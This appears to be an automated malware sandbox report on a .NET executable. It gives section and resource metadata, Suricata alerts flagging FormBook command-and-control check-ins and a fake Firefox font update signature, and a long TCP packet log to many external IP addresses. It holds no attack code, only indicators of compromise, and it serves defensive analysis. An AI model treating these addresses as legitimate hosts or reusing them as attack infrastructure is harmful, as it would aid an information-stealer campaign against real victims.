                                                                                                  .text0x20000xb53c80xb5400c5082fbf55dd006fb251267fb2352b82False0.9394329202586207data7.8166018627464435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xb80000x4ca80x5000e1d5ff217803184103be564ba46d4cafFalse0.917724609375data7.667304319458959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xbe0000xc0x400e03af90853abef4c1678bcc5639e1561False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xb81000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                                  RT_GROUP_ICON0xbc80c0x14data1.05
                                                                                                  RT_VERSION0xbc8300x278data0.4699367088607595
                                                                                                  RT_MANIFEST0xbcab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-03T09:46:36.488058+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304986023.209.72.40443TCP
                                                                                                  2024-12-03T09:47:39.905261+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304986223.209.72.40443TCP
                                                                                                  2024-12-03T09:47:41.441153+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304986374.208.236.15680TCP
                                                                                                  2024-12-03T09:48:05.301968+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304986784.32.84.3280TCP
                                                                                                  2024-12-03T09:48:18.645129+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304987213.248.169.4880TCP
                                                                                                  2024-12-03T09:48:32.218635+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304987666.29.149.4680TCP
                                                                                                  2024-12-03T09:48:45.495495+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.30498803.33.130.19080TCP
                                                                                                  2024-12-03T09:48:59.970320+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049884129.226.153.8580TCP
                                                                                                  2024-12-03T09:49:14.510292+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049888104.21.7.18780TCP
                                                                                                  2024-12-03T09:49:30.034731+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049892103.230.159.8680TCP
                                                                                                  2024-12-03T09:49:44.460049+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304989643.156.176.25380TCP
                                                                                                  2024-12-03T09:49:46.472651+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304989723.44.201.22443TCP
                                                                                                  2024-12-03T09:49:59.191939+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304990131.31.196.1780TCP
                                                                                                  2024-12-03T09:50:13.261399+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304990531.31.196.1780TCP
                                                                                                  2024-12-03T09:50:26.571805+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049909172.67.159.2480TCP
                                                                                                  2024-12-03T09:50:40.292986+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049913103.224.182.24280TCP
                                                                                                  2024-12-03T09:50:54.126112+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304991784.32.84.3280TCP
                                                                                                  2024-12-03T09:51:08.411111+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049921185.68.16.16080TCP
                                                                                                  2024-12-03T09:51:22.513791+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049925185.134.245.11380TCP
                                                                                                  2024-12-03T09:51:30.851730+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304992674.208.236.15680TCP
                                                                                                  2024-12-03T09:51:43.253969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.3049930104.208.16.95443TCP
                                                                                                  2024-12-03T09:51:44.524793+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304993184.32.84.3280TCP
                                                                                                  2024-12-03T09:51:52.911174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304993423.209.72.40443TCP
                                                                                                  2024-12-03T09:51:57.672727+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304993613.248.169.4880TCP
                                                                                                  2024-12-03T09:52:11.145885+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304994066.29.149.4680TCP
                                                                                                  2024-12-03T09:52:27.340347+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.30499443.33.130.19080TCP
                                                                                                  2024-12-03T09:52:41.673824+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049948129.226.153.8580TCP
                                                                                                  2024-12-03T09:52:56.088849+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049952104.21.7.18780TCP
                                                                                                  2024-12-03T09:53:10.826772+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049956103.230.159.8680TCP
                                                                                                  2024-12-03T09:53:25.118345+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304996043.156.176.25380TCP
                                                                                                  2024-12-03T09:55:02.379173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304996123.209.72.40443TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 3, 2024 09:47:41.172110081 CET4986380192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:47:41.301914930 CET804986374.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:47:41.302180052 CET4986380192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:47:41.304838896 CET4986380192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:47:41.434631109 CET804986374.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:47:41.440196037 CET804986374.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:47:41.440856934 CET804986374.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:47:41.441153049 CET4986380192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:47:41.441962004 CET4986380192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:47:41.571719885 CET804986374.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:47:56.671672106 CET4986480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:56.883217096 CET804986484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:47:56.883464098 CET4986480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:56.886923075 CET4986480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:57.098828077 CET804986484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:47:57.098848104 CET804986484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:47:59.408997059 CET4986580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:59.620486021 CET804986584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:47:59.620678902 CET4986580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:59.625017881 CET4986580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:47:59.836146116 CET804986584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:47:59.836580992 CET804986584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:02.142450094 CET4986680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:02.353770971 CET804986684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:02.354063988 CET4986680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:02.357923031 CET4986680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:02.570116997 CET804986684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:02.570127010 CET804986684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:04.876266003 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.087352991 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.087594986 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.090152979 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.301481962 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301582098 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301594019 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301603079 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301729918 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301740885 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301749945 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301820040 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301898956 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:05.301968098 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.302103043 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.302218914 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.303050995 CET4986780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:48:05.514448881 CET804986784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:48:10.501568079 CET4986880192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:10.612049103 CET804986813.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:10.612224102 CET4986880192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:10.616728067 CET4986880192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:10.726236105 CET804986813.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:10.726821899 CET804986813.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:10.726952076 CET4986880192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:12.124380112 CET4986880192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:12.235359907 CET804986813.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:13.139797926 CET4986980192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:13.249897957 CET804986913.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:13.250062943 CET4986980192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:13.253774881 CET4986980192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:13.362658978 CET804986913.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:13.362680912 CET804986913.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:13.362893105 CET4986980192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:14.764065027 CET4986980192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:14.872900009 CET804986913.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:15.781389952 CET4987180192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:15.892746925 CET804987113.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:15.893105030 CET4987180192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:15.897372961 CET4987180192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:15.897422075 CET4987180192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:16.007263899 CET804987113.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:16.007344007 CET804987113.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:16.007363081 CET804987113.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:16.007572889 CET804987113.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:18.419847965 CET4987280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:18.530240059 CET804987213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:18.530478954 CET4987280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:18.533057928 CET4987280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:18.642889023 CET804987213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:18.644743919 CET804987213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:18.644752026 CET804987213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:18.645128965 CET4987280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:18.645857096 CET4987280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:48:18.754901886 CET804987213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:48:23.772663116 CET4987380192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:23.938602924 CET804987366.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:23.938831091 CET4987380192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:23.942636013 CET4987380192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:24.108553886 CET804987366.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:24.130732059 CET804987366.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:24.130740881 CET804987366.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:24.131061077 CET4987380192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:25.448870897 CET4987380192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:26.464914083 CET4987480192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:26.631299973 CET804987466.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:26.631588936 CET4987480192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:26.635591030 CET4987480192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:26.801590919 CET804987466.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:26.816209078 CET804987466.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:26.816219091 CET804987466.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:26.816453934 CET4987480192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:28.151465893 CET4987480192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:29.168644905 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:29.336008072 CET804987566.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:29.336256027 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:29.341114998 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:29.341185093 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:29.508296013 CET804987566.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:29.527301073 CET804987566.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:29.527549028 CET804987566.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:29.527791977 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:30.853770971 CET4987580192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:31.869951963 CET4987680192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:32.036047935 CET804987666.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:32.036468983 CET4987680192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:32.038939953 CET4987680192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:32.204844952 CET804987666.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:32.218189001 CET804987666.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:32.218198061 CET804987666.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:32.218635082 CET4987680192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:32.219444990 CET4987680192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:48:32.385940075 CET804987666.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:48:37.349946022 CET4987780192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:37.457909107 CET80498773.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:37.458142996 CET4987780192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:37.463009119 CET4987780192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:37.570871115 CET80498773.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:37.580810070 CET80498773.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:37.581026077 CET4987780192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:38.977118969 CET4987780192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:39.085007906 CET80498773.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:39.993446112 CET4987880192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:40.101653099 CET80498783.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:40.101874113 CET4987880192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:40.106524944 CET4987880192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:40.214592934 CET80498783.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:40.215842009 CET80498783.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:40.216034889 CET4987880192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:41.617161036 CET4987880192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:41.725378990 CET80498783.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:42.634200096 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:42.742104053 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:42.742373943 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:42.749752045 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:42.749802113 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:42.857805967 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:42.857817888 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:42.857872963 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:43.756995916 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:43.757185936 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:44.257278919 CET4987980192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:44.365111113 CET80498793.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.273544073 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.381331921 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.381676912 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.384803057 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.492518902 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.495043039 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.495050907 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.495495081 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.496665001 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.501276016 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:45.501580954 CET4988080192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:48:45.604373932 CET80498803.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:48:50.632704020 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:50.975651979 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:50.975847960 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:50.982342958 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.325231075 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.326978922 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327056885 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327111006 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327125072 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327136993 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327152014 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327164888 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327269077 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.327291965 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327337027 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.327359915 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.327420950 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.327568054 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.328808069 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.329061031 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670322895 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670383930 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670392990 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670402050 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670437098 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670444965 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670453072 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670460939 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670485973 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670494080 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670500994 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670509100 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670568943 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670612097 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670654058 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670661926 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670663118 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670670986 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670679092 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670686007 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.670720100 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670768976 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670793056 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670793056 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670890093 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670939922 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.670989037 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:51.671938896 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.671987057 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:51.672243118 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.013861895 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.013890982 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.013911009 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.013947010 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014014006 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014067888 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014082909 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014096022 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014108896 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014122963 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014137030 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014151096 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014168024 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014173985 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014183998 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014199972 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014215946 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014229059 CET8049881129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:52.014266014 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014322996 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014372110 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014420986 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014470100 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.014518976 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:52.489707947 CET4988180192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:53.506480932 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:53.849360943 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:53.849572897 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:53.853912115 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:54.196681023 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198331118 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198371887 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198434114 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198441982 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198486090 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198555946 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198615074 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198625088 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198637962 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.198846102 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:54.198846102 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:54.198846102 CET4988280192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:48:54.200400114 CET8049882129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:48:54.200803995 CET4988280192.168.11.30129.226.153.85
